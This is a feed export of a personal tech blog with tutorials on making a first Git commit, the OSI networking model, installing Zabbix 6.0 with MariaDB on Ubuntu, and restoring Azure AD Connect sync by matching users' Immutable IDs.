Git is a distributed version control system that tracks changes in any set of computer files. It is usually used for coordinating work among programmers who are collaboratively developing source code during software developme...]]></description><link>https://chinhnd.org/making-your-first-github-commit</link><guid isPermaLink="true">https://chinhnd.org/making-your-first-github-commit</guid><category><![CDATA[GitHub]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Mon, 14 Aug 2023 01:42:08 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/4vMfb8srdTQ/upload/90167ff7cebfaf5ba6aa42aa41c9d938.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-are-git-and-github"><em>What are Git and GitHub?</em></h1>
<p>Git is a distributed version control system that tracks changes in any set of computer files. It is usually used for coordinating work among programmers who are collaboratively developing source code during software development.</p>
<p>GitHub is a cloud-based service for software development and version control using Git.</p>
<p>In summary, Git is a tool that developers install locally to manage source code while GitHub is an online service to which developers who use Git can connect and upload or download resources.</p>
<h1 id="heading-repositories"><em>Repositories</em></h1>
<p>A repository (also known as a repo) is how we refer to a project version controlled by Git.</p>
<p>There are two types of repositories:</p>
<ul>
<li><p>Local repositories are repositories that are stored on a computer.</p>
</li>
<li><p>Remote repositories are repositories that are hosted on a hosting service.</p>
</li>
</ul>
<p>There are many companies that provide hosting for projects using Git. The main hosting services are GitHub, GitLab, and Bitbucket.</p>
<h1 id="heading-working-directory"><em>Working Directory</em></h1>
<p>The working directory contains the files and directories in the project directory that represent one version of a project.</p>
<p>It is where you add, edit, and delete files and directories.</p>
<p>Suppose the Book project that I am working on has 100 chapters, and I have 100 text files, one for each chapter: <code>chapter_one.txt</code>, <code>chapter_two.txt</code>, and so on.</p>
<p>To add each of these chapter files to my project, I would create these files in the working directory.</p>
<p>If I wanted to make any changes to the content of those chapters, I would start by editing the files in the working directory.</p>
<p>And finally, if I decided I wanted to remove an entire chapter of my book, I would delete the corresponding file in the working directory.</p>
<h1 id="heading-local-repositories"><em>Local Repositories</em></h1>
<p>To turn a directory into a Git repository you have to initialize it.</p>
<p>When you initialize a repository, the .git directory is automatically created inside the project directory.</p>
<p>To initialize a Git repository, you use the</p>
<pre><code class="lang-bash">❯ git init -b &lt;branch-name&gt; &lt;project-name&gt;
</code></pre>
<p>command. Your current directory must be the project directory you want to turn into a repository when you execute this command.</p>
<p>For example:</p>
<pre><code class="lang-bash">❯ git init -b main git-begin
</code></pre>
<p>will create the current directory as a Git directory with the branch name <code>main</code>.</p>
<pre><code class="lang-bash"> Directory: C:\Users\nguyenducchinh\git-begin
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    da-h--         8/12/2023   2:07 PM                .git
</code></pre>
<p>You have now successfully initialized a local Git repository. This is what it currently looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/587b900540f97734da6ce1ef85af93ea867bac9f0d80df12e7a233521a293041.webp" alt /></p>
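<p>Assuming Git is installed, you can verify what <code>-b</code> did by asking the new repository which branch HEAD points at (run from any scratch directory):</p>

```shell
set -e
cd "$(mktemp -d)"                   # a scratch directory to experiment in
git init -q -b main git-begin       # creates ./git-begin with a .git directory inside
git -C git-begin symbolic-ref HEAD  # prints refs/heads/main: HEAD points at main
```
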
<p>Within the .git directory, there are two important areas we want to explore further: the staging area and the commit history.</p>
<pre><code class="lang-bash">Directory: C:\Users\nguyenducchinh\git-begin\.git
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d-----         8/12/2023   2:07 PM                hooks
    d-----         8/12/2023   2:07 PM                info
    d-----         8/12/2023   2:07 PM                objects
    d-----         8/12/2023   2:07 PM                refs
    -a----         8/12/2023   2:07 PM            130 config
    -a----         8/12/2023   2:07 PM             73 description
    -a----         8/12/2023   2:07 PM             21 HEAD
</code></pre>
<p>We’ll take a look at those next and also discuss the concept of a commit in a little more detail.</p>
<h3 id="heading-staging-area"><em>Staging area</em></h3>
<p>The staging area is similar to a rough draft space. It is where you can add and remove files when you are preparing what you want to include in the next saved version of your project (your next commit). The staging area is represented by a file in the .git directory called index.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/851fee595c75b4aea0956e93a2b31a422be08857d83cadc50b327d0cb42b1906.webp" alt /></p>
<h3 id="heading-commit-history"><em>Commit History</em></h3>
<p>The commit history is where your commits live. It is represented by the objects directory inside the .git directory.</p>
<p>Now that we have a complete Git diagram showing the most important areas when working with Git, let’s add the first file to the project and use a text editor to edit it.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/2b15e073dfba00570cb757e6b1a8a24d65ee31426a609600fa831cad174e7510.webp" alt /></p>
<h2 id="heading-making-a-commit"><em>Making a Commit</em></h2>
<p>What is a commit? A commit represents one version of a project. Every time you want to save a new version of a project, you can make a commit.</p>
<p>Committing is important because it allows you to back up your work. A common saying in the world of Git is “commit early, commit often”. Once you’ve made a commit, you’ll be able to go back and look at that commit to see what your project looked like at that point in time and avoid the frustration of losing unsaved work.</p>
<p>We will create one file, called colors.txt, in our working directory. This is now what our project looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/8c66bde6e7123ac58dc3cc2b313282fa4ef8122d7edfe3918dd10ca6a1ea99e0.webp" alt /></p>
<p>Making a commit is a two-step process:</p>
<ul>
<li><p>Add all the files you want to include in the next commit to the staging area.</p>
</li>
<li><p>Make a commit with a commit message.</p>
</li>
</ul>
<pre><code class="lang-bash">❯ git status
On branch main
No commits yet

Untracked files:
(use <span class="hljs-string">"git add &lt;file&gt;..."</span> to include <span class="hljs-keyword">in</span> what will be committed)
        colors.txt

nothing to commit (create/copy files and use <span class="hljs-string">"git add"</span> to track)
</code></pre>
<p>The <code>git status</code> output informs you:</p>
<ul>
<li><p>There is no commit history yet.</p>
</li>
<li><p>The colors.txt file is an untracked file.</p>
</li>
<li><p>Git tells you how to add the untracked file to the staging area: use "git add &lt;file&gt;..." to include in what will be committed.</p>
</li>
</ul>
<h3 id="heading-add-file-to-the-staging-area"><em>Add file to the Staging area</em></h3>
<p>To add files to the staging area, you use the <code>git add</code> command. If you only want to add individual files that you have edited to the staging area, then you can pass in the filename or filenames to the git add command as arguments. To add all the files you have edited or changed in your working directory, you can use the git add command with the -A option (which stands for “all”).</p>
<pre><code class="lang-bash">❯ git add -A

❯ git status

On branch main
No commits yet
Changes to be committed:
    (use <span class="hljs-string">"git rm --cached &lt;file&gt;..."</span> to unstage)
        new file:   colors.txt
</code></pre>
<p>As mentioned above, the staging area lets you choose which updated files (or changes) will be included in your next commit. You can see that the file colors.txt will be in the next commit.</p>
<p>This is what our project looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/81ca09b871c25d20535038706fbc2691b1449effa7b2c42b37714c1dfbd82103.webp" alt /></p>
<p>The <code>git add</code> command does not move a file from the working directory to the staging area; it copies the file's current contents from the working directory into the staging area.</p>
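<p>You can see this copy-not-move behaviour yourself: stage a file, then edit it again, and <code>git status</code> reports two different states for it. A sketch in a scratch repository named <code>demo</code> (my own example name):</p>

```shell
set -e
cd "$(mktemp -d)"
git init -q -b main demo && cd demo
echo "red" > colors.txt
git add colors.txt              # copies the current contents into the staging area
echo "blue" >> colors.txt       # the working-directory copy changes; the staged copy does not
git status --short colors.txt   # prints "AM colors.txt": added (staged) + modified (unstaged)
```

<p>The <code>AM</code> status means the file is Added in the staging area and Modified again in the working directory; the staged copy still holds the contents from the moment you ran <code>git add</code>.</p>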
<p>With the colors.txt file in the staging area, we are now ready to make a commit with a commit message.</p>
<h3 id="heading-make-a-commit"><em>Make a Commit</em></h3>
<p>To make a commit, you will use the <code>git commit</code> command and pass in the <code>-m</code> option (which stands for “message”). The message should usually be a brief description of the changes you made in this version of the project.</p>
<pre><code class="lang-bash">❯ git commit -m <span class="hljs-string">"first commit"</span>
 [main (root-commit) a513742] first commit
   1 file changed, 0 insertions(+), 0 deletions(-)
   create mode 100644 colors.txt
</code></pre>
<p>Now that we have made the first commit in the repository, let’s take a look at the information recorded about it in the commit history with <code>git log</code>:</p>
<pre><code class="lang-bash">❯ git <span class="hljs-built_in">log</span>

commit a51374292e065da20b52ea4f9c377134cd5e0761 (HEAD -&gt; main)
Author: Nguyen Duc Chinh &lt;susuomlu@gmail.com&gt;
Date:   Sat Aug 12 15:00:47 2023 +0700
  first commit
</code></pre>
<p>The <code>git log</code> output shows:</p>
<ul>
<li><p>The full commit hash of the commit.</p>
</li>
<li><p>The author of the commit.</p>
</li>
<li><p>The date and time at which the commit was made.</p>
</li>
<li><p>The commit message, which in this case is ”first commit”.</p>
</li>
</ul>
<p>This is what our project looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/9c0ab2008642ad7619af46ca1e6d13323178ef03cbd52d314415004d928ee137.webp" alt /></p>
<p>In this topic, I introduced the different areas you interact with when working with Git: the working directory, the staging area, the commit history, and the local repository.</p>
<p>We also learned the two steps of making a commit (adding files to the staging area, then committing with a commit message) and made the first commit in the repository.</p>
<p>In the next topic, we will learn about Git Branches and Merging.</p>
]]></content:encoded></item><item><title><![CDATA[The OSI Networking Model]]></title><description><![CDATA[What Is OSI?
The Open Systems Interconnection (OSI) model is a conceptual model that describes how different communication systems talk to each other on a computer network
OSI was the first standard model for network communications, adopted by all ma...]]></description><link>https://chinhnd.org/the-osi-networking-model</link><guid isPermaLink="true">https://chinhnd.org/the-osi-networking-model</guid><category><![CDATA[networking]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Wed, 02 Aug 2023 06:26:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/40XgDxBfYXM/upload/3ba5559e00d8e587961c4ed437cdbed1.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-osi"><strong>What Is OSI?</strong></h1>
<p>The Open Systems Interconnection (OSI) model is a conceptual model that describes how different communication systems talk to each other on a computer network.</p>
<p>OSI was the first standard model for network communications, adopted by all major computer and telecommunication companies in the early 1980s.</p>
<p>The modern Internet is not based on OSI but on the simpler TCP/IP model. However, the OSI 7-layer model is still widely used, as it helps visualize and communicate how networks operate and helps isolate and troubleshoot networking problems.</p>
<h1 id="heading-osi-layers"><strong>OSI Layers</strong></h1>
<p>OSI contains 7 layers.</p>
<p>These layers are the Application, Presentation, Session, Transport, Network, Data link, and Physical layer.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691976394211/6f88d899-a0f9-465f-af62-35cbe404c534.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-application-layer"><strong>Application Layer</strong></h2>
<p>The application layer is used by user-facing software such as web browsers or email clients.</p>
<p>This layer provides services that include: e-mail, transferring files, distributing results to the user, directory services, network resources, and so on.</p>
<p>It provides protocols that allow the software to send and receive information and present meaningful data to users.</p>
<p>A few examples of application layer protocols are the Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Post Office Protocol (POP), Simple Mail Transfer Protocol (SMTP), Domain Name System (DNS), and Teletype Network Protocol (Telnet).</p>
<p>Depending on the information the user wants to send over the network, a specific protocol is used:</p>
<ul>
<li><p>The SMTP or POP3 protocol is used to send an e-mail message.</p>
</li>
<li><p>The FTP protocol is used to transmit a file over the network.</p>
</li>
<li><p>The Telnet protocol is used to control a remote device.</p>
</li>
</ul>
<h2 id="heading-presentation-layer"><strong>Presentation Layer</strong></h2>
<p>The presentation layer prepares data for the application layer.</p>
<p>It ensures that information sent by the application layer of one system is readable by the application layer of another system. It defines how two devices should encode, encrypt, and compress data so it is received correctly on the other end.</p>
<p>Simply put, the presentation layer serializes complex data structures into flat byte strings (using mechanisms such as TLV, XML, or JSON) before they are sent over the network.</p>
<h2 id="heading-session-layer"><strong>Session Layer</strong></h2>
<p>The session layer creates communication channels between devices.</p>
<p>It is responsible for opening sessions, ensuring they remain open and functional while data is being transferred, and closing them when communication ends.</p>
<p>It also offers other services such as authentication and reconnection after an interruption. It creates checkpoints and recovery, which is useful for re-transmitting data in case of a system failure.</p>
<h2 id="heading-transport-layer"><strong>Transport Layer</strong></h2>
<p>The transport layer is responsible for providing end-to-end communication between two devices.</p>
<p>On the sender end, the transport layer divides a message into smaller segments that contain a sequence number and the port address. Then it reassembles the segments on the receiving end, turning them back into data that can be used by the session layer.</p>
<p>The transport layer provides two types of services: connection-oriented and connectionless services.</p>
<ul>
<li><p>The Transmission Control Protocol (TCP) is a connection-oriented protocol that provides reliable data transfer. It establishes a connection between two devices before transmitting data. TCP provides error checking and flow control mechanisms to ensure that data is transmitted reliably.</p>
</li>
<li><p>The User Datagram Protocol (UDP) is a connectionless protocol that provides fast data transfer. It does not establish a connection before transmitting data. UDP does not provide error checking or flow control mechanisms, so data may be lost or arrive out of order.</p>
</li>
</ul>
<h2 id="heading-network-layer"><strong>Network Layer</strong></h2>
<p>The network layer is responsible for routing data packets from one network to another. It provides logical addressing and routing services.</p>
<p>It typically uses Internet Protocol (IP) addresses to route packets to a destination node.</p>
<p>It determines the best path for data transmission based on network conditions and traffic load.</p>
<p>The network layer also provides congestion control mechanisms to ensure that data is transmitted at an optimal rate.</p>
<h2 id="heading-data-link-layer"><strong>Data Link Layer</strong></h2>
<p>The data link layer is responsible for the transmission of data between devices on the same network. It breaks up packets into frames and sends them from source to destination.</p>
<p>This layer is composed of two parts:</p>
<ul>
<li><p>Logical Link Control (LLC), which identifies network protocols, performs error checking, and synchronizes frames.</p>
</li>
<li><p>Media Access Control (MAC), which uses MAC addresses to connect devices and define permissions to transmit and receive data.</p>
</li>
</ul>
<h2 id="heading-physical-layer"><strong>Physical Layer</strong></h2>
<p>The physical layer is responsible for the physical or wireless connection between network nodes.</p>
<p>It defines the connector, the electrical cable, or wireless technology connecting the devices, and is responsible for the transmission of the raw data, which is simply a series of 0s and 1s while taking care of bit rate control.</p>
<h2 id="heading-advantages-of-the-osi-model"><strong>Advantages of the OSI model</strong></h2>
<p>The advantages of the OSI model are:</p>
<ul>
<li><p>It helps to standardize routers, switches, motherboards, and other hardware.</p>
</li>
<li><p>It is a generic model and acts as a guidance tool to develop any network model.</p>
</li>
<li><p>It helps users and operators of computer networks to determine the required hardware and software to build their network.</p>
</li>
<li><p>It helps users and operators of computer networks to understand and communicate the process followed by components communicating across a network.</p>
</li>
<li><p>It helps users and operators perform troubleshooting, by identifying which network layer is causing an issue and focusing efforts on that layer.</p>
</li>
</ul>
<h2 id="heading-osi-and-tcpip"><strong>OSI and TCP/IP</strong></h2>
<p>TCP/IP and OSI are two different models used for network communication. OSI follows an academic approach, whereas TCP/IP follows a practical approach.</p>
<p>The TCP/IP model is a functional model designed to solve specific communication problems, while OSI is a generic, protocol-independent model intended to describe all forms of network communication.</p>
<p>TCP/IP is a standard protocol used for every network including the Internet, while OSI is not a protocol but a reference model used for understanding and designing the system architecture.</p>
<p>A key difference between the models is that TCP/IP is simpler, collapsing several OSI layers into one:</p>
<ul>
<li><p>OSI layers 5, 6, and 7 are combined into one application layer in TCP/IP.</p>
</li>
<li><p>OSI layers 1 and 2 are combined into one network access layer in TCP/IP.</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691976577187/f6f7ff00-9006-4304-bd51-9f25cf0989fb.png" alt class="image--center mx-auto" /></p>
<p>Surprisingly, the TCP/IP model came into existence about 10 years before the OSI model. As it turned out, TCP/IP had too much momentum to be overtaken by the OSI model or any of the other competing network models.</p>
]]></content:encoded></item><item><title><![CDATA[Zabbix Monitoring Tool]]></title><description><![CDATA[What is Zabbix?
Zabbix is an open-source monitoring software tool that helps organizations track and monitor their IT infrastructure and networks in real-time. It is designed to provide comprehensive monitoring of networks, servers, applications, and...]]></description><link>https://chinhnd.org/zabbix-monitoring-tool</link><guid isPermaLink="true">https://chinhnd.org/zabbix-monitoring-tool</guid><category><![CDATA[automation]]></category><category><![CDATA[networking]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Wed, 02 Aug 2023 06:19:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/qwtCeJ5cLYs/upload/38b9ee04b1e2d0d388f1bed28f096a64.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-zabbix"><strong>What is Zabbix?</strong></h1>
<p>Zabbix is an open-source monitoring software tool that helps organizations track and monitor their IT infrastructure and networks in real-time. It is designed to provide comprehensive monitoring of networks, servers, applications, and services, and to alert administrators when problems occur.</p>
<p>Zabbix can monitor various aspects of IT infrastructure such as CPU, memory, disk usage, network bandwidth, and more. It provides a centralized platform for monitoring and reporting, allowing administrators to view the status of all devices and services on their network from a single dashboard.</p>
<p>Zabbix offers a wide range of features, including data collection via SNMP, JMX, IPMI, and other protocols, real-time alerting, flexible reporting and analysis, and the ability to automate remediation actions. It also supports the visualization of data through charts, graphs, and maps.</p>
<h1 id="heading-zabbix-operation"><strong>Zabbix Operation</strong></h1>
<p>Zabbix collects information from network devices and servers using two methods: agentless and agent-based.</p>
<h2 id="heading-agentless"><strong>Agentless</strong></h2>
<p>It allows administrators to monitor devices without the need to install an agent on each device.</p>
<p>Agentless monitoring in Zabbix works by using protocols such as ICMP, SNMP, and SSH to gather data from network devices and servers.</p>
<p>For example, ICMP can be used to check the availability of network devices, SNMP can poll device metrics, and SSH can be used to execute commands on remote servers and retrieve data.</p>
<p>However, agentless monitoring may not be as comprehensive as agent-based monitoring, as it relies on standard protocols that may not provide access to all of the performance data available on a device.</p>
<p>Additionally, agentless monitoring may be less secure than agent-based monitoring, as it requires the use of credentials to access devices over the network.</p>
<h2 id="heading-zabbix-agent"><strong>Zabbix Agent</strong></h2>
<p>Agent installation: in this mode, an agent is installed on each monitored device. The agent collects data on the device's performance and sends it to the Zabbix server for processing.</p>
<ul>
<li><p>Data collection: Zabbix can collect data from a variety of sources, including SNMP, JMX, IPMI, and other protocols. The collected data is stored in a database for analysis and reporting.</p>
</li>
<li><p>Threshold monitoring: Zabbix allows administrators to set thresholds for the collected data. When a value exceeds a threshold, Zabbix generates an alert, which can be sent to one or more designated recipients via email, SMS, or other channels.</p>
</li>
<li><p>Alerting: Zabbix can send alerts to multiple recipients based on user-defined rules. Administrators can define different levels of severity for different types of alerts and set up escalation policies to ensure timely responses to critical issues.</p>
</li>
<li><p>Reporting: Zabbix provides a range of reporting options, including real-time dashboards, scheduled reports, and ad-hoc queries. Reports can be customized to provide the specific information required by administrators.</p>
</li>
<li><p>Remediation: Zabbix also supports the ability to automate remediation actions, such as restarting a service or executing a script, based on user-defined rules.</p>
</li>
</ul>
<h2 id="heading-zabbix-structure"><strong>Zabbix Structure</strong></h2>
<p>The web front-end is what we normally open in our web browser and is used as a centralized visualization and configuration platform.</p>
<p>The Zabbix server is the brain of the entire system, which is responsible for gathering data from the hosts and proxies, analyzing it, and acting based on the triggers that we have created.</p>
<p>The database is where everything is stored, what we configure in our front end: items, hosts, proxies, triggers, actions, or whatever else. We collect those data from our hosts and store them in the database for the period we need.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691978701035/79771512-f5d7-4e56-b63f-cbe21013b8bf.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-zabbix-installation"><strong>Zabbix Installation</strong></h1>
<h2 id="heading-system-requirement"><strong>System Requirement</strong></h2>
<p>OS: Ubuntu 22.04 LTS (can be changed to lower or other distros)</p>
<p>Zabbix version: 6.0 LTS</p>
<p>Database version: MariaDB 10.6 (you can use PostgreSQL or MySQL)</p>
<p>Firewall setting: TCP 80 &amp; 443</p>
<h2 id="heading-zabbix-server-installation"><strong>Zabbix Server Installation</strong></h2>
<p>Download and install the repo for Zabbix's latest stable version 6.0 LTS.</p>
<pre><code class="lang-bash">wget https://repo.zabbix.com/zabbix/6.0/ubuntu/pool/main/z/zabbix-release/zabbix-release_6.0-4+ubuntu22.04_all.deb
sudo dpkg -i zabbix-release_6.0-4+ubuntu22.04_all.deb
sudo apt update
</code></pre>
<p>Install the necessary packages for the Zabbix server.</p>
<pre><code class="lang-bash">sudo apt install zabbix-server-mysql zabbix-frontend-php zabbix-apache-conf zabbix-sql-scripts zabbix-agent -y
</code></pre>
<h2 id="heading-database-installation"><strong>Database Installation</strong></h2>
<p>Download and install the repo for MariaDB.</p>
<pre><code class="lang-bash">curl -LsS -O https://downloads.mariadb.com/MariaDB/mariadb_repo_setup
sudo bash mariadb_repo_setup --mariadb-server-version=10.6
sudo apt update
</code></pre>
<p>Install the necessary packages and enable MariaDB.</p>
<pre><code class="lang-bash">sudo apt install mariadb-common mariadb-server-10.6 mariadb-client-10.6 -y
sudo systemctl start mariadb
sudo systemctl <span class="hljs-built_in">enable</span> mariadb
</code></pre>
<p>Run the secure installation script and answer the prompts to harden the database.</p>
<pre><code class="lang-bash">sudo mysql_secure_installation

Remove anonymous users? Yes
Disallow root login remotely? Yes
Remove <span class="hljs-built_in">test</span> database and access to it? Yes
</code></pre>
<p>Create a user and database for Zabbix.</p>
<pre><code class="lang-bash"><span class="hljs-comment">#Access SQL with user root</span>
sudo mysql -u root
mysql &gt; create database zabbix character <span class="hljs-built_in">set</span> utf8mb4 collate utf8mb4_bin;
mysql &gt; grant all privileges on zabbix.* to zabbix@localhost identified by <span class="hljs-string">'password'</span>;
mysql &gt; <span class="hljs-built_in">set</span> global log_bin_trust_function_creators = 1;
mysql &gt; flush privileges;
mysql &gt; quit

<span class="hljs-comment"># Import the initial schema and data</span>
sudo zcat /usr/share/zabbix-sql-scripts/mysql/server.sql.gz | mysql --default-character-set=utf8mb4 -uzabbix -p<span class="hljs-string">'password'</span> zabbix
</code></pre>
<h2 id="heading-set-up-zabbix"><strong>Set Up Zabbix</strong></h2>
<p>Change the Zabbix setting file.</p>
<pre><code class="lang-bash">sudo nano /etc/zabbix/zabbix_server.conf
<span class="hljs-comment">#edit below part which matches with your info.</span>
DBName=zabbix
DBUser=zabbix
DBPassword=password
</code></pre>
<p>Restart Zabbix services.</p>
<pre><code class="lang-bash">sudo systemctl restart zabbix-server zabbix-agent
sudo systemctl <span class="hljs-built_in">enable</span> zabbix-server zabbix-agent
</code></pre>
<p>You can now access the Zabbix web interface and complete the setup:</p>
<p><a target="_blank" href="http://your-ip-add/zabbix">your-ip-add/zabbix</a></p>
<p>Input the database information that you created above and complete the setup.</p>
]]></content:encoded></item><item><title><![CDATA[How to migrate Azure AD Connect from a Disaster Recovery]]></title><description><![CDATA[What is Azure AD Connect?
Simply put, Azure AD Connect is a solution to automatically synchronize identity data between their on-premises Active Directory environment and Azure AD. That way, users can use a single identity to access on-premises appli...]]></description><link>https://chinhnd.org/how-to-migrate-azure-ad-connect-from-a-disaster-recovery</link><guid isPermaLink="true">https://chinhnd.org/how-to-migrate-azure-ad-connect-from-a-disaster-recovery</guid><category><![CDATA[Cloud]]></category><category><![CDATA[networking]]></category><category><![CDATA[Disaster recovery]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Wed, 02 Aug 2023 06:09:20 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/M5tzZtFCOfs/upload/1d13e6fca1a58c97bed7bb552d5c0509.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-azure-ad-connect"><em>What is Azure AD Connect?</em></h1>
<p>Simply put, Azure AD Connect is a solution to automatically synchronize identity data between their on-premises Active Directory environment and Azure AD. That way, users can use a single identity to access on-premises applications and cloud services such as Microsoft 365.</p>
<p>It includes a number of technologies:</p>
<ul>
<li><p>Azure AD Connect Sync</p>
</li>
<li><p>Azure AD Connect Health</p>
</li>
<li><p>ADFS (Active Directory Federation Services)</p>
</li>
<li><p>The PHS/PTA/SSSO Provisioning Connector</p>
</li>
</ul>
<p>Azure AD Connect supports integration with other Microsoft products such as Office 365, SharePoint, Dynamics CRM, and Outlook.</p>
<p>Alternatively, you can also consider the cloud-managed solution: Azure AD Connect cloud sync.</p>
<h1 id="heading-what-happens-if-you-lose-your-azure-ad-sync"><em>What happens if you lose your Azure AD sync?</em></h1>
<p>If you lose your Azure AD sync, it depends on the type of sync you are using.</p>
<p>If you sync password hashes, you can still connect to O365 without issue.</p>
<p>If you use Pass-through Authentication, you’re dead, no access to O365.</p>
<p>When the sync is interrupted, you will not be able to make changes to the on-premises Active Directory and those changes will not be synchronized to Azure AD until you restore connectivity.</p>
<h1 id="heading-how-to-migrate-existing-azure-ad-connect-after-a-network-disaster"><em>How to migrate existing Azure AD connect after a network disaster?</em></h1>
<h2 id="heading-create-the-same-ad-server"><em>Create the same AD server</em></h2>
<p>Firstly, make sure we rebuild an AD server that holds all the same identities.</p>
<p>Create an AD with the same domain name. My local domain is "clayton.local".</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/5ab60de705f2ae9d9a699a4b5da3863f8d33dfb1b8b31282922aedea80be9611.webp" alt /></p>
<p>Go to Tools &gt; Active Directory Domains and Trusts.</p>
<p>Right-click the domain, choose Properties, and add an alternative UPN suffix.</p>
<p>I use my own: "<a target="_blank" href="http://susuomlu.com">susuomlu.com</a>". This will be our UPN suffix.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/5144b9592a454b9a4490ba31cbbe0ff7a629244b29bd37ff95b991f8352f63ee.webp" alt /></p>
<h2 id="heading-manually-create-users-with-the-same-sids"><em>Manually create users with the same SIDs</em></h2>
<p>Go to <a target="_blank" href="http://portal.azure.com">portal.azure.com</a> &gt; Azure Active Directory &gt; Users and select users that need to be synchronized.</p>
<p>Click on 'Properties' and you will see the value of the "On-premises immutable ID" attribute.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/7db10c1717b193fafb36c71db80984d02ddce11f67408110e204129e5d34cc9f.webp" alt /></p>
<p>Alternatively, we can export the Immutable IDs (IIDs) of all users with the script below:</p>
<pre><code class="lang-powershell">Install-Module MSOnline
Import-Module MSOnline
Connect-MsolService
$onlineusers = Get-MsolUser -All | Select-Object UserPrincipalName,ImmutableID,LastDirSyncTime | Export-Csv C:\IID.csv -NoTypeInformation
</code></pre>
<p>Run the script to export the Immutable IDs of all users; the .csv file is stored at C:\IID.csv.</p>
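<p>If the exported list is long, a small helper can turn the .csv into the PowerShell array literal used in the next step. Here is a minimal sketch in Python (the file path and the <code>ImmutableID</code> column name follow the export above; cloud-only users, which have an empty Immutable ID, are skipped):</p>

```python
import csv

def build_iid_array(csv_path):
    """Read the exported IID.csv and emit a PowerShell array literal
    containing every non-empty ImmutableID value."""
    with open(csv_path, newline="") as f:
        iids = [row["ImmutableID"] for row in csv.DictReader(f) if row["ImmutableID"]]
    return "$IID_List = @(" + ",".join("'%s'" % i for i in iids) + ")"

# Example: print the line to paste into the conversion script
# print(build_iid_array(r"C:\IID.csv"))
```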
<h2 id="heading-create-the-unique-sid-from-immutable-id"><em>Create the unique SID from Immutable ID</em></h2>
<p>Run this PowerShell script, replacing the list with the Immutable IDs from the .csv file.</p>
<pre><code class="lang-powershell"># Replace this list with the Immutable IDs from the exported .csv file (you can put more into it)
$IID_List = @('dMIj64cN/0CM9fmLIexC4g==','I4VwJomrjUWzPHk6sMlh3g==','rT8wJf+DrkCcKVxXX7ADzA==','vqhLzR9Mq0aEvHed8eA00Q==')

# Decode a base64 Immutable ID into a 32-character uppercase hex string
Function Convert_IID_to_SID ($IID){
    $bytes = [System.Convert]::FromBase64String($IID)
    $hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($bytes.Length * 2)
    foreach ($byte in $bytes) {
        $hex.AppendFormat("{0:x2}", $byte) &gt; $null
    }
    $hex.ToString().ToUpper()
}

Foreach ($item in $IID_List) {
    Convert_IID_to_SID($item)
}
</code></pre>
<p>After the run, 32-character hex values should appear, one per Immutable ID. Copy them for later use.</p>
<p>Carefully check that each hex value is matched to the correct user.</p>
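<p>The same conversion can be spot-checked outside PowerShell. Here is a minimal sketch in Python, using only the standard library: it decodes a base64 Immutable ID to the 32-character hex value and converts back, so you can verify that a value round-trips to the original ID:</p>

```python
import base64

def iid_to_hex(iid_b64):
    """Decode a base64 Immutable ID (16 bytes) to the 32-character
    uppercase hex string entered into ms-DS-ConsistencyGuid."""
    return base64.b64decode(iid_b64).hex().upper()

def hex_to_iid(hex_str):
    """Inverse conversion, for verifying a pasted value."""
    return base64.b64encode(bytes.fromhex(hex_str)).decode()

iid = "dMIj64cN/0CM9fmLIexC4g=="
hex_value = iid_to_hex(iid)
print(len(hex_value))                # 32
print(hex_to_iid(hex_value) == iid)  # True
```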
<h2 id="heading-create-new-users-with-the-same-unique-immutable-id"><em>Create new users with the same unique Immutable ID</em></h2>
<p>Create the users, using the UPN suffix added earlier.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/97941b74ff5d6d5296604c61af7c1d2c9b06a2aa057858c21244f9707d84326f.webp" alt /></p>
<p>Go to View and Enable Advanced Features</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/06111f1d3d3e8ca573fd872856924642f7568128d63427edfad2d9e9d18acc79.webp" alt /></p>
